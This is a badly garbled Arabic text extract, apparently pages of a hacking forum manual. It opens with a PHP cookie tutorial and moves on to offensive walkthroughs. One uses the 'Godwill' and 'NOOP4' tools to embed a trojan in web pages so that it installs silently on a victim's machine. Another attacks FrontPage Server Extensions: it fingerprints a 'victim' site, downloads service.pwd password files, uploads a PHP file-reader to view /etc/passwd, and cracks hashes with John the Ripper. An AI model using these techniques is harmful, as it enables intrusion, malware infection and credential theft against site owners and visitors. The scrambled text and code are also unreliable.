. user.‬‬ ‫مثال ‪:‬‬ ‫‪:code‬‬ ‫>?‬ ‫‪.‬‬ ‫عندما يطلب المستخدم من متصفحِه صفحة على موقعك فان المتصفح يقوم بارسال جميع الكعكات التي قمت‬ ‫انت بزراعتها عند المستخدم ‪ PHP .php‬إحدى صفحات الموقع و التي تستفيد من خدمات الملف ‪.com : the best Hacking forum‬‬ ‫>‪<body/‬‬ ‫>‪<html/‬‬ ‫قراءة الكعكات من جهاز العميل‬ ‫ كيف تستقبل المتغيرات من الكعكة ‪:‬‬‫كما قلنا بانه بامكانك ارسال اكثر من كعكة الى متصفح واحد ‪..php‬‬ ‫‪:code‬‬ ‫>?‬ ‫‪-----------------------*/‬‬ ‫‪151‬‬ .‬تسهل عليك قراءة هذه الكعكات و تخزنها في مصفوفة اسمها‬ ‫‪ $_COOKIE‬و هي مصفوفة من النوع ‪ Associative Arrays‬بحيث ان المفتاح هو اسم الكعكة و‬ ‫القيمة قيمة الكعكة كما ارسلتها ‪.‬‬ ‫ ماذا لدينا ؟‬‫‪ -1‬الملف ‪ : user.php‬يقوم الملف بعمليتين ‪:‬‬ ‫‪ <-‬الولى ‪ :‬تحديد اللون الذي اختاره الزائر ‪..com‬‬ ‫تطبيق ‪ :‬تخصيص لون الخلفية‬ ‫كمثال بسيط دعنا نقوم بانشاء موقع مبسط و نستخدم الكعكات لكي نحفظ لون الخلفية المحببة الى الشخص ‪.php‬‬ ‫وإليك الكود الخاص بكل ملف ‪:‬‬ ‫‪ -1‬الملف ‪: user.['echo $_COOKIE['site‬‬ ‫?<‬ ‫و هذه تطبع ‪:‬‬ ‫‪:code‬‬ ‫‪palhackerz.‫>‪<body‬‬ ‫>? ‪<? ..‬‬‫‪ <-‬الثانية ‪ :‬عرض نموذج اختيار الللون و حفظ اللون المختار‬‫‪ -2‬الملف ‪ index."echo " palhackerz.

Color Clearing Form --!> <"form name=color_clear method="GET> <"INPUT type="hidden" name="do" value="clear_color> <"‫="ل تتذكر لوني المفضل‬INPUT type="submit" value> <FORM/> ?> { 152 ..Cookies-Based Background Selector <Created By : "Rasha"<rasha@h4palestine.Color setting Form --!> <"form name=color_select method="GET> <"INPUT type="hidden" name="do" value="set_color> "=INPUT name="color" type="text" value> <"<? ..com /*------------------------- }()function display_form <? <html> <body> <-.com For : h4palestine.()echo get_color ?> <"‫="احفظ اللون‬INPUT type="submit" value> <FORM/> <-.

time()-36000 .time()+36000 .(setcookie('color'.$_GET['color'].php { selection // }('if ($do=='display_form .(setcookie('color'.}()function set_color .$_GET['color']."return "#FFFFFF { { }()function clear_color .('header('Location:index.()display_form 153 .php { }()function get_color .global $_GET .['return $_COOKIE['color }else{ .global $_COOKIE }((['if(isset($_COOKIE['color .('header('Location:index.

‬‬‫ الدالة الثالثة ‪ get_color‬ترجع قيمة اللون من الكعكة و اذا لم يكن هنالك قيمة فانها ترجع لون افتراضي‬‫وهو البيض ‪..‬‬ ‫ الدالة الرابعة ‪ clear_color‬تقوم بمسح الكعكة بالطريقة التي ذكرناها في الدرس ‪.php‬كما يلي ‪:‬‬ ‫‪:code‬‬ ‫>‪<html‬‬ ‫>‪.‬‬‫‪ -2‬ملف الـ ‪: index.php‬‬ ‫ملف عادي جدًا ال انه يطلب الدالة ‪ get_color‬من ملف ‪ user..('BODY bgcolor="<? include('user.php?do=display_form‬صفحة تخصيص اللون>‪<a/‬‬ ‫>‪<body/‬‬ ‫>‪<html/‬‬ ‫انتهى‪،،،‬‬ ‫‪154‬‬ .()set_color‬‬ ‫{‪}("elseif ($do=="clear_color‬‬ ‫‪.‫{‪}("elseif ($do=="set_color‬‬ ‫‪..‬‬ ‫>‪<br‬‬ ‫يمكنك تخصيص لون الخلفية من هنا‬ ‫>‪<br‬‬ ‫>‪ <"a href="user.‬‬‫ الدالة الثانية ‪ set_color‬تقوم بحفظ اللون المختار في كعكة و ترجع المستخدم الى الصفحة الرئيسية ‪.()clear_color‬‬ ‫{‬ ‫?<‬ ‫ الدالة الولى ‪ display_form‬تقوم فقط بعرض نموذج اختيار اللون ‪..php‬‬ ‫‪<"<? ()echo get_color‬‬ ‫>‪<h1‬مرحبا بك ‪<h1/>.

‬‬ ‫و تجد هذا البرنامج في اللينك التالي‪:‬‬ ‫‪155‬‬ .‬‬ ‫** ملف الباتش الذي تريد وضعه في الصفحة‪ ).‬يجب أن يكون أقل من ‪ 34‬بايت (‬ ‫** برنامج السطورة ‪ Godwill‬لتلغيم الصفحة‪.‫" شرح برنامج السطورة ‪God Will‬في تلغيم الصفحات "‬ ‫>ةةةةة ةة ةةةةة ةةة ةةة<‬ ‫>ةةةةةة‪ :‬ةة ةةةة<‬ ‫كل ما يلزمنا هو ‪:‬‬ ‫** ملف الــ ‪ html‬الذي تريد تلغيمه‪.

‬‬ ‫‪156‬‬ .zip‬‬ ‫و السيريال نامبر‪tlsecurity :‬‬ ‫لنبدأ‪:‬‬ ‫بعد تجهيز ملف الــ ‪ html‬المراد تلغيمه‪ ،‬و ملف الباتش‪ ،‬شغل برنامج ‪ Godwill‬بعد تحميل‪ ،‬و ستجد‬ ‫أمامك النافذة التالية‪..geocities..com/love2002_il/godwill16.‫‪http://www...‬‬ ‫اضغط على زر ‪ html‬لتجد نفسك في النافذة التالية‪.

..‬‬ ‫اتبع التعليمات الموجودة في هذه النافذة‪ ،‬و من ثم اضغط الزر ‪Done‬‬ ‫بعدها ستنتقل إلى النافذة التالية‪.‫اضغط على الخيار ‪ General Options‬لتنتقل للنافذة التالية‪...‬‬ ‫‪157‬‬ .

tripod..‬‬ ‫انتهى‪،،،‬‬ ‫‪158‬‬ ..‬سيقوم الباتش بتحميل نفسه بنفسه بدون أن يحس الضحية بأي شيء‬ ‫) طبعا إل إذا كان لديه ‪ ( zone Alarm‬و عند إعادته لتشغيل الكمبيوتر‪ ،‬سيقوم الباتش بتشغيل نفسه‪ ..co.uk‬و احتفظ بعنوان صفحتك الملغومة جيدا‪.lycos.‬و‬ ‫ستصلك رساله منه برقم أي بي جهاز الضحية و رقم البورت الذي تم فتحه‪.‬‬ ‫عند فتح الضحية لصفحتك الملغومة‪ .‬‬ ‫و هون بقى ‪ ،‬أنت بتعرف شغلك‪...‬‬ ‫قم بتحميل الصفحة على إحدى المواقع المستضيفة للصفحات مثل‬ ‫‪ /http://www......enter Output 3‬و هذا‬ ‫الملف يمثل الصفحة الملغومة‪..‫اضغط زر ‪Gen‬‬ ‫سيظهر لك في مجلد البرنامج ملف له نفس السم الذي وضعته في الحقل رقم ‪ ..

‫" وداعا ً للبرنامج السطورة ومرحبا ببرنامج ‪"NOOP4‬‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪< ¤§.‬‬ ‫ول يجعلك ترتبط لحجم معين مثل برنامج ‪.0‬‬ ‫من ااجل عيون الجوكر والجميع =======================================‬ ‫=============================‬ ‫‪ -1‬البرنامج‬ ‫الصوره توضح ما هوالشرح عند ضغطك علي البرنامج وفتحه سوف تاتي هذه الشاشه‬ ‫=================‬ ‫======================‬ ‫=============================‬ ‫‪ layout 2‬للبرنامج‪<<<<====:::‬‬ ‫هو خاص بتكوينات الصفحه وينقسم الي ‪ 6‬اجزاء‬ ‫‪ -2‬خاصه بتكوين الصفحه لمستخدمي ‪Internet Explorer 5‬‬ ‫‪ -3‬خاص بتكوين الصفحه لمستخدمي ‪Internet Explorer5.. godwill‬‬ ‫هذا البرنامج من اجل دمج بالباتش وتهيئة علي اساس انه صفحه علي النت‬ ‫اسم البرنامج هو ‪noob 4.®MoHfOx®.§¤ :‬‬ ‫وهو ل يرتقى إلى مستوى ‪ god will‬لكنه خفيف جدا ‪.5‬‬ ‫‪4‬و ‪ 5‬هما الي تحديد نوع الملفات المستخدمه في الدمج‬ ‫‪ -6‬هي ما سوف يقوم البرنامج بدمجه مع الصفحه من ملفات‬ ‫‪159‬‬ .

‫==================================================‬ ‫===================‬ ‫‪ executable file 3‬لختيار الباتش ‪<<<<====:::‬‬ ‫‪ -7‬لتحديد مكان الباتش من علي الجهاز‬ ‫‪ -8‬للبداء في تكوين الباتش‬ ‫=======================================‬ ‫=============================‬ ‫‪ -9‬هو اخر المطاف هو انهاء العدادت لتكوين الباتش مع الصفحه‪<<<<====:::‬‬ ‫‪160‬‬ .

..‬‬ ‫انتهى‪،،،‬‬ ‫‪161‬‬ .‫وفي نهايه عمل البرنامج يعطي لك المكان الذي تريد ان يحفظ في الصفحه المدموجه‪.‬‬ ‫وصلة البرنامج‪.

‬‬ ‫* كيفية جمع المعلومات الخاصة بأي موقع ‪.L. FrontPage Server Extensions‬‬ ‫* آلية عمله ‪.‬كيفية التصال بـ ‪FrontPage Extension Server‬‬ ‫‪ . Screen Capture‬‬ ‫@ خريطة الموضوع ‪:‬‬ ‫‪ .‬ما هي آلية عمل الـ ‪ FrontPage Extension Server‬؟‬ ‫‪ .‫" معلومات مهمة عن المواقع التي تدعم الفرونت بيج "‬ ‫>ةةةةة<‬ ‫>ةةةةةة‪<.‬كيفية معرفة هل الموقع يدعم الـ ‪ FrontPage‬أم ل‬ ‫‪ .‬‬ ‫@ مقدمة ‪:‬‬ ‫تسعى شركات التسكين بأنواعها توفير شتى شبل الراحة لعملئها ‪ ،‬فتجدهم يقدمون العروض و التخفيضات‬ ‫لرضاء العملء مثل دعم لـ ‪ PHP‬و‬ ‫‪ CGI‬و ‪ Perl‬و ‪ SSL‬و ‪ FTP‬و ‪. Telnet‬‬ ‫* كيفية التعامل مع بروتوكول ‪.O. HTTP‬‬ ‫* كيفية التعامل مع قواعد البيانات العلئقية ‪.‬‬ ‫* قراءة المزيد عن الـ ‪ FrontPage Server Extensions‬و ليس كيفية اختراقه ‪.‬ما هو الـ ‪ FrontPage Server Extensions‬؟‬ ‫‪ .‬كيفية استغلله ليصبح في صلحك‬ ‫@ ما الذي ستستفيده عند قراءتك للموضوع ؟‬ ‫* ستعرف ما هو الـ ‪. Language‬‬ ‫و اذكر أخيرًا بأني اؤمن بأن المخترق ما هو إل انسان وظيفته البرمجة و ادارة و تحليل النظم و الشبكات و‬ ‫ليس انسان همه هو معرفة القليل‬ ‫من المور التي تساعده في التخريب و العبث بما تعب به الخرون و تضييع الوقت في الدردشة و التسكع‬ ‫بمقاهي النترنت ‪ ،‬و لذا فافترض بأن‬ ‫ما أقوله سيكون واضحًا و ل يحتاج لـ ‪.‬‬ ‫* كيفية التعامل مع برنامج ‪. ( T.‬ما الذي ستسفيده عند قراءة الموضوع ؟‬ ‫‪ . SQL‬‬ ‫و بالنسبة لمدارء المواقع ‪ Webmasters‬فإن البرنامج المفضل لهم لتصميم مواقعهم هو ‪Microsoft‬‬ ‫‪ Office FrontPage‬و الذي كما هو مبين يأتي‬ ‫‪162‬‬ .‬‬ ‫* بعض الطرق للستفادة منه عند التصال بالخادم الخاص به ‪.‬مقدمة‬ ‫‪ . Microsoft Office FrontPage‬‬ ‫* كيفية التعامل مع الـ ‪. ( DeXXa :‬‬ ‫ما الذي يجب أن تعرفه قبل قراءة هذا الدرس ‪:‬‬ ‫* اللمام بالنجليزية ‪. CHMOD‬‬ ‫* كيفية التعامل مع الـ ‪. SQL‬‬ ‫* كيفية التعامل مع أحد لغات الويب و التي تعمل بناحية الخادم ‪Server Side Scripting‬‬ ‫‪.

btr‬و ‪ : doctodep.‬‬ ‫‪fpcount.‬‬ ‫@ ما هو الـ ‪ FrontPage Server Extensions‬؟‬ ‫) ملحظة ‪ :‬سأتكلم حاليًا عن الحزم التي أتت بعد حزمة الصدار الثاني (‬ ‫هو عبارة عن حزمة من البرامج يتم تثبيتها في الخادم ‪ Server‬الخاص بشركة التسكين التي لها قالبية‬ ‫لدعم بعض الخصائص ‪.‫مع حزمة ‪ ، Office‬اذ يتميز بسهولة استعماله كما انه يوفر بعض البرمجيات مثل عداد الزوار ‪ ،‬و لذا تقدم‬ ‫شركات التسكين دعم كامل للبرنامج ‪.‬‬ ‫كما يوجد ملفان هما ‪:‬‬ ‫‪shtml.‬‬ ‫‪/vti_aut_/. authors‬‬‫ ملفي ‪ deptodoc..‬‬ ‫و عند التثبيت يجب انشاء عدة مجلدات منها ‪:‬‬ ‫‪private_/‬‬ ‫‪vti_bin_/‬‬ ‫‪vti_cnf_/‬‬ ‫‪vti_log_/‬‬ ‫‪vti_pvt_/‬‬ ‫‪vti_txt_/‬‬ ‫و سأتكلم عن وظيفة كل مجلد يهمنا ‪:‬‬ ‫* المجلد _‪: vti_bin‬‬ ‫و يتواجد بداخله مجلدان هما ‪:‬‬ ‫) ملحظة ‪ :‬النقطتان تشيران إلى المجلد _‪( vti_bin‬‬ ‫‪/vti_adm_/..grp‬و فيه يتواجد المعرفين من مشرفين و ‪.exe/..‬‬ ‫و في الغالب ل تستطيع معاينة محتويات المجلد اذ يوجد في المجلد الرئيسي للموقع ملف ‪ htaccess.‬‬ ‫ الملف ‪ : service.pwd‬و فيه يتواجد المعرف و كلمة المرور الخاصة بالمشرف مشفرة بمقياس ‪DES‬‬‫‪.‬‬ ‫* المجلد _‪: vti_pvt‬‬ ‫و يتواجد بداخله عدة ملفات ما يهمنا منها هو الملفات التالية ‪:‬‬ ‫ الملف ‪ : service..exe/.‬يقوم‬ ‫بمنع الجميع ) المالك و المجموعة و‬ ‫‪163‬‬ .btr‬و فيه يتواجد مسارات الملفات التي تم تحميلها على‬‫الخادم ‪ ،‬فاذا قمت بتنزيله فتستطيع معرفة الملفات‬ ‫الموجودة بالموقع ‪.‬‬ ‫الثاني ل يهمنا بقدر ما يهم المجلد الول اذ أنه الخاص بالمشرف ول تستطيع الستفادة منه اذا لم تحصل على‬ ‫كلمة المرور الخاصة به ‪.

‬‬ ‫@ ما هي آلية عمل الـ ‪ FrontPage Extension Server‬؟‬ ‫يعتمد التصال بين العميل و الـ ‪ FrontPage Extension Server‬على بروتوكول الـ ‪.html‬بواسطة المتصفح و ذلك بارفاقه بعنوان الموقع ‪ ،‬مثال ‪:‬‬ ‫‪164‬‬ .‫الزوار ( من معاينة المجلد و محتوياته ‪. Open Web‬‬ ‫* قم باضافة المعرف و كلمة المرور ) الصلية و ليست المشفرة ( ‪. HTTP‬‬ ‫فلو اردنا معاينة عداد الزوار عن طريق برنامج الـ ‪ FrontPage‬فانه يتم ارسال طلب ‪ Request‬للخادم‬ ‫ثم يمرره الخادم بالـ ‪FrontPage Extension Server‬‬ ‫و الذي يمرره بالتالي ببرمجيات الخادم مثل ‪ ، fpcount.‬‬ ‫* اذا كانت صحيحة سيظهر لك الخادم ملفات الموقع كلها و عندها تستطيع التحميل و التعديل في الملفات و‬ ‫المجلدات و معاينة الشفرة المصدرية‬ ‫للملفات ‪.‬‬ ‫@ كيفية التصال بـ ‪: FrontPage Extension Server‬‬ ‫كما ذكرنا سابقًا ان أغلب شركات التسكين تسعى لراحة العملء ‪ ،‬فتجدها تدعم خدمة الـ ‪ FrontPage‬و‬ ‫ذلك لتحميل الصفحات للموقع علمًا بأنها‬ ‫تدعم بروتوكول الـ ‪ FTP‬و تحميل الملفات و انشاء المجلدات عبر المتصفح اعتمادًا على البرمجيات التي‬ ‫تعمل بناحية الخادم ‪.html‬و لكن هذا ل يعني أن الموقع ل يدعم الخدمة ‪ ،‬كما أنه ل‬ ‫يعتبر ثغرة (‬ ‫ قم بزيارة أي موقع تريد أن تعرف هل الخادم الخاص به يدعم الـ ‪ FrontPage‬أم ل ‪.‬‬ ‫@ كيفية معرفة هل الموقع يدعم الـ ‪ FrontPage‬أم ل ‪:‬‬ ‫يوجد العديد من الطرق لمعرفة قابلية الموقع لدعم الفرونت بيج نذكر منها ‪:‬‬ ‫* معاينة ملف نجاح التثبيت ‪:‬‬ ‫) ملحظة ‪ :‬قد ل تجد ملف _‪ vti_inf.exe‬و من ثم يكرر تمريره مرة أخرى إلى الـ‬ ‫‪ Extension Server‬و إلى الخادم و يظهر المخرجات‬ ‫لـ العميل ‪ ،‬علمًا ان هذه التصالت تتم عبر جدار نار ‪.‬‬ ‫و الن قم بتنفيذ التالي لمعرفة كيفية التصال بالـ ‪: FrontPage Extension Server‬‬ ‫) ملحظة ‪ :‬سأتكلم حاليًا عن حزمة الـ ‪ XP‬و التي ل تختلف أبدًا عن الحزم الباقية إل في بعض النقاط‬ ‫الشكلية (‬ ‫* قم بتشغيل برنامج الـ ‪ FrontPage‬و الذي يأتي مرفقًا مع حزمة ‪.‬‬ ‫* اذا لم تتم العملية بنجاح فهذا يعني بأن الموقع ل يدعم الخدمة أو أن المعرف أو كلمة المرور خاطئة و‬ ‫يطلب منك معاينتها في وضعية القراءة و ل‬ ‫يظهر لك الشفرة المصدرية الصلية ول المجلدات و الملفات التي يحويها الموقع ‪. Office‬‬ ‫* من قائمة ‪ File‬قم باختيار ‪. htaccess.‬‬‫‪ -‬قم بمعانية ملف _‪ vti_inf.‬‬ ‫) ملحظة ‪ :‬ان عدم وضع أي صلحية على المجلدل يعني بأنها تعتبر ثغرة و لكن ضعف من الناحية (‬ ‫* المجلد _‪: private‬‬ ‫و يتواجد بداخله ملف واحد فقط هو ‪.

html‬‬ ‫ و عند معاينة الصفحة ستجد جملة ‪ ، FrontPage Configuration Information‬فهذا معناه أن‬‫حزمة الـ ‪ FrontPage Extension Server‬قد تم تثبيتها‬ ‫في الخادم بنجاح ‪. Source Code‬‬‫ قم بالبحث بين ترميزي الرأس >‪ <Head></Head‬عن الشفرة التالية ‪:‬‬‫>‪<"Meta Name="GENERATOR" Content="Programe‬‬ ‫ حيث ‪ Programe‬يرمز لنوع البرنامج و اذا كان البرنامج هو ‪ Microsoft FrontPage X. X‬‬ ‫* الكشف عن الشفرة المصدرية للصفحة ‪:‬‬ ‫ قم بزيارة أي موقع تريد أن تعرف هل الخادم الخاص به يدعم الـ ‪ FrontPage‬أم ل ‪. FrontPage Extensions Server‬‬ ‫* عن طريق الـ ‪: Telnet‬‬ ‫‪165‬‬ .net‬‬‫ قم بكتابة عنوان الموقع مستثنيًا الـ ‪.Victim.‬‬ ‫و لمعرفة اصدارة الخدمة قم بالتالي ‪:‬‬ ‫ قم بالنقر بزر الفأرة اليمن على الصفحة ‪ ،‬ثم قم باختيار ‪.Victim.com/_vti_inf.com/_vti_cnf‬‬ ‫ قم بالنقر بزر الفأرة اليمن على الصفحة ‪ ،‬ثم قم باختيار ‪.‬‬‫ ستجد أن الموقع أعطاك بعض المعلومات عن الملقم و الخدمات الموجودة في الموقع الذي تريد معرفة‬‫قابلية دعمه للبرنامج ‪ ،‬و من تلك الخدمات‬ ‫خدمة الـ ‪ FrontPage‬و ستظهر لك بالشكل ‪ mod_frontpage/X‬حيث ‪ X‬يرمز لصدارة الـ‬ ‫‪.‬‬‫ قم بالنقر بزر الفأرة اليمن على الصفحة ‪ ،‬ثم قم باختيار ‪. X‬‬ ‫* عن طريق موقع ‪: NetCraft‬‬ ‫ قم بزيارة الموقع ‪.‬‬‫ قم بمعانية المجلد بواسطة المتصفح و ذلك بارفاقه بعنوان الموقع ‪ ،‬مثال ‪:‬‬‫‪http://www. //:http‬‬‫ انتظر بضع ثواني ‪.‫‪http://www. NetCraft. Source Code‬‬‫ قم بالبحث عن الشفرة التالية ‪:‬‬‫‪vti_generator:Programe‬‬ ‫ حيث ‪ Programe‬يشير لنوع البرنامج و اصدارته و سيكون في حالتنا هو ‪Microsoft‬‬‫‪ FrontPage X‬و الصدارة الخاصة به هي ‪. Source Code‬‬‫ قم بالبحث عن ‪ "FPVersion="Version‬حيث ‪ Version‬تشير للصدار الخاص بالخدمة ‪.0‬يتبين‬‫لنا بأن الخادم الخاص بالموقع يدعم الفرونت بيج و‬ ‫الصدارة الخاصة به هي ‪.‬‬‫* عن طريق مجلد _‪: vti_cnf‬‬ ‫ قم بزيارة أي موقع تريد أن تعرف هل الخادم الخاص به يدعم الـ ‪ FrontPage‬أم ل ‪.

Victim.‬‬‫ ستستلم الجابة ‪ Response‬عن الطلب الذي ارسلتهب للخادم ‪ Server‬مثل تاريخ آخر تعديل للصفحة‬‫و نوع الملقم و الخدمات المتوفرة به ‪.‬‬ ‫و من ضمن الخدمات ستجد نفس الذي وجدناه في الطريقة السابقة و هو أن خدمة الـ ‪ FrontPage‬و‬ ‫ستظهر لك بالشكل ‪mod_frontpage/X‬‬ ‫حيث ‪ X‬يرمز لصدارة الـ ‪.("open = FOpen($file.Victim.‫) ملحظة ‪ :‬تساعد هذه الطريقة في معرفة بعض المعلومات عن الخادم و المخرجات هي نفس مخرجات‬ ‫الطريقة السابقة (‬ ‫ من قائمة ‪ Start‬قم باختيار ‪ Run‬و اكتب بالنافذة التي ستظهر ‪.Echo $get‬‬ ‫‪. FrontPage Extensions Server‬‬ ‫@ كيفية استغلله ليصبح في صالحك ‪:‬‬ ‫اذا عثرت على موقع يدعم هذه الخدمة و لم يتم وضع صلحيات على مجلد الـ _‪ vti_pvt‬قم بالتالي ‪:‬‬ ‫) ملحظة ‪ :‬عليك اللمام بلغة تعمل على ناحية الخادم و في حالتنا فهي الـ ‪ ، PHP‬كما أن على الموقع‬ ‫الضحية دعم هذه اللغة (‬ ‫* قم بالتصال بالموقع الضحية ‪.net‬هو البروكسي‬‫الخاص بمزود الخدمة الخاص بك ‪:‬‬ ‫‪Head www. "r$‬‬ ‫‪.((get = FGets($open.1‬‬ ‫‪Host: ISP. Telnet‬‬‫ قم بالتصال بالموقع عبر المنفذ ‪ 80‬بالشكل التالي ‪:‬‬‫‪Microsoft Telnet> Open www.FClose $open‬‬ ‫?<‬ ‫‪166‬‬ . Head‬‬‫) ملحظة ‪ :‬عليك اللمام بكيفية التعامل مع بروتوكول ‪( HTTP‬‬ ‫ قم بارسال التالي حيث ‪ http://www.net‬هو الموقع الضحية و ‪ ISP.‬‬ ‫* قم بتحميل ملف ينتهي امتداده بـ ‪ PHP‬و ضمنه التالي ‪:‬‬ ‫>?‪PHP‬‬ ‫‪.net HTTP/1.net‬‬ ‫‪*/* :Accept‬‬ ‫‪Connection: close‬‬ ‫ انتظر بضع ثواني ‪.Victim.com 80‬‬ ‫ قم بارسال طلب ‪ Request‬للخادم و لتكن الطريقة ‪ Method‬هي ‪. FileSize($file$‬‬ ‫‪.

Victim.com/uploded_file../.‬‬ ‫انتهى‪،،،‬‬ ‫‪167‬‬ .../etc/passwd‬‬ ‫حيث ‪ uploded_file‬يشير لسم الملف الذي قمت بتحميله ‪ ،‬و تستطيع اضافة اوامر تسمح لك بمعاينة‬ ‫الملفات و المجلدات الموجودة في الخادم ‪.‫و قمنا هنا برفع ملف ‪ PHP‬للخادم يقوم بفتح ملف غير معين ثم يحضر محتوياته على حسب حجمه بالبايت‬ ‫ثم يعرضه ثم يغلق الملف ‪ ،‬و الن كل‬ ‫ما عليك فعله الن هو الدخول على الموقع عبر المتصفح و الحاقه بـ بعنوان الملف الذي حملته و المتغير‬ ‫‪ file‬و الملف الذي تريد معاينة الشفرة‬ ‫المصدرية الخاصة به ‪ ،‬مثال ‪:‬‬ ‫‪http://www...

com‬‬ ‫وكتابة اسم الموقع وبعد البحث سوف يظهر‬ ‫‪mod_frontpage/x‬‬ ‫‪)=x‬رقم الصدار الخاص بالفرونت بيج(‬ ‫ عن طريق إضافة جملة‬‫‪/_vti_inf.almodammer.html‬‬ ‫وبعدها اضغط ‪Enter‬‬ ‫وراح يطلعلك في أول الصفحة هذه الكلمة‬ ‫‪Frontpage Configuration Information‬‬ ‫أي قد تم تثبيت مجلدات وبرامج الفرونت بيج‬ ‫ وأيضا تستطيع معرفة الموقع يدعم الفرونت بيج أم ل‬‫بإضافة‬ ‫‪/_vti_cnf‬‬ ‫بعد عنوان الموقع كهذا المثال‪:‬‬ ‫‪http://www.com/_vti_pvt‬‬ ‫وأول ماندخله نلحظ وجود ملفات عديدة وأهم الملفات التي تأتي باسم‪:‬‬ ‫‪168‬‬ .com:‬‬ ‫نضيف الجملة ليصبح بهذه الطريقة‬ ‫‪http://www.almodammer.Unix‬‬ ‫‪ -1‬وسف أقوم الن بشرح طريقة لمعرفة هل هذه المواقع تدعم ‪ frontpage‬أم ل؟‬ ‫بعدة طرق ولن أذكر إل السهل‪:‬‬ ‫ بالذهاب إلى موقع ‪netcraft‬‬‫‪/http://www.almodammer.com/_vti_inf.html‬‬ ‫بعد عنوان الموقع لنفرض أن الموقع‪/http://www.com/_vti_cnf‬‬ ‫واضغط زر الفأرة اليمن واختار‬ ‫‪ source‬المصدر‬ ‫وابحث عن‬ ‫‪vti_generator:Programe‬‬ ‫حيث‬ ‫‪ Programe‬تعني لنوع برنامج الفرونت بيج والصدارات الخاصة به‬ ‫‪-------------------------------------------------‬‬‫‪ -2‬ألحين وعرفنا الموقع يدعم ‪ frontpage‬كيف نقدر نوصل لملف الباسوورد؟‬ ‫بسيطة إنت هات الموقع الي يبدعم ‪ frontpage‬واعلمك‬ ‫يعني وعلى سبيل المثال‬ ‫‪/http://www.‫" اختراق المواقع التي تدعم الفرونت بيج "‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪ :‬ةةةةةة<‬ ‫اكثر منا يعلم ان هذه الثغرة خاصة بنظام‪//‬‬ ‫‪NT .com‬‬ ‫يدعم ‪ fontpage‬طيب نذهب إلى ملف ‪_vti_pvt‬‬ ‫كذا يعني‬ ‫‪http://www.almodammer.netcraft.almodammer.

‫=============‬ ‫‪Adminstrator.pwd‬‬ ‫=============‬ ‫ألحين لنفرض إننا فتحنا أحد هذه الملفات ماذا نلحظ نلحظ وجود‬ ‫‪username:passwd‬‬ ‫اسم المستخدم والباسوورد‬ ‫يعني انا اخترقت موقع بالفرونت بيج ولما جيت ابي اشوف الملفات طلعلي ملف ‪ service‬يحتوي على‬ ‫‪user / password‬‬ ‫وهذا مضمون الملف‬ ‫‪operator:hi9LHn9wAMuKM‬‬ ‫حيث اسم المستخدم‪operator:‬‬ ‫الباسوورد المشفرة هي‪hi9LHn9wAMuKM:‬‬ ‫ألحين وعرفنا يااخواني كيف نطلع الباسوورد المشفر ماباقي إل نفك تشفيره‬ ‫وهذا يتم ببرامج كثير‬ ‫=)‪=(Crack Jack‬‬ ‫=)‪=(John The Ripper‬‬ ‫راح نستخدم الفضل والكثر تداول وهو‬ ‫‪John The Ripper‬‬ ‫لتحميل البرنامج من هذا الموقع‪::‬‬ ‫‪http://www.pwd‬‬ ‫‪Service.‬‬ ‫حتى توصل‬ ‫>\‪c:‬‬ ‫بعدين اكتب‬ ‫‪cd john‬‬ ‫اضغط على ‪Enter‬‬ ‫‪169‬‬ .pwd‬‬ ‫‪Adminstrators.pwd‬‬ ‫‪Author.pwd‬‬ ‫‪User.pwd‬‬ ‫‪Users.openwall..com/john‬‬ ‫كيف تفك التشفير بهذا البرنامج‬ ‫أول شي تروح تنقل البرنامج إلى مجلد‬ ‫\‪c:‬‬ ‫بعدين تفتح مجلد ‪RUN‬‬ ‫وتسويلك مستند نصي ‪ txt‬وتسمي الملف ‪ passwd‬وتضع فيه كلمة السر الي تبي تفك تشفيرها‬ ‫إذهب إلى‬ ‫ابدأ ‪start‬‬ ‫تشغيل ‪run‬‬ ‫اكتب المر‬ ‫‪command‬‬ ‫اضغط على ‪ Enter‬وبعدها راح يفتح‬ ‫إطار الـ ‪DoS‬‬ ‫اذهب إلى مجلد ‪RUN‬‬ ‫وذلك بالخروج من المجلدات الي راح تظهر لك واذا تبي تطلع من أي مجلد استخدم المر‬ ‫‪cd.

txt‬‬ ‫‪---------------------------------‬‬‫يبحث عن الحرف الصغيرة‬ ‫====‬ ‫‪john -i:Digits passwd.txt‬‬ ‫‪---------------------------------‬‬‫يبحث عن الرقام‬ ‫====‬ ‫‪john -single passwd.txt‬‬ ‫‪--------------------------------‬‬‫أمر يبحث لك عن الباسووردات التي تطابق اسم المستخدم‬ ‫‪-------------------------------------------------------------------------------‬‬‫وبعد ماتجرب كل هذي الوامر وإذا تبي تشوف هل إنت فكيت وكسرت الباسوورد ول ل إذهب إلى‬ ‫‪john.pot‬‬ ‫الموجود داخل البرنامج وراح يعرض لك الباسوورد وبعد فك تشفيرها‬ ‫‪-------------------------------------------------------------------------------‬‬‫إنت ألحين مستريح عندك ‪ username‬والـ ‪password‬‬ ‫وش بقالك ؟!!‬ ‫يقالك تلعب بالموقع لعب ألحين دخوله بعدة طرق وأحسنها من‪/‬‬ ‫)‪(1‬‬ ‫‪frontpage‬‬ ‫بعدين‬ ‫‪ file‬وتذهب إلى‬ ‫‪ open web‬وتضيف‬ ‫السم والباسوورد وعاد كذا انت الحين تقدر تعدل الملفات على كيفك‬ ‫)‪(2‬‬ ‫من ‪FTP‬‬ ‫وعليك ببرامج الـ ‪ FTP‬المنتشرة‬ ‫كالـ ‪ws-ftp‬‬ ‫والـ ‪pro ftp‬‬ ‫‪170‬‬ .txt‬‬ ‫‪-------------------------‬‬‫يبحث لك عن جميع النواع والحتمالت‬ ‫====‬ ‫‪john -i:Alpha passwd.‫وراح يظهر لك بهذا الشكل‬ ‫>‪c:\john‬‬ ‫واكتب‬ ‫‪cd RUN‬‬ ‫وبتدخل المجلد ليصبح بهذه الطريقة‬ ‫>‪c:/john/RUN‬‬ ‫ألحين نكتب أوامر برنامج ‪John The Ripper‬‬ ‫وهي‬ ‫====‬ ‫‪john -i:all passd.

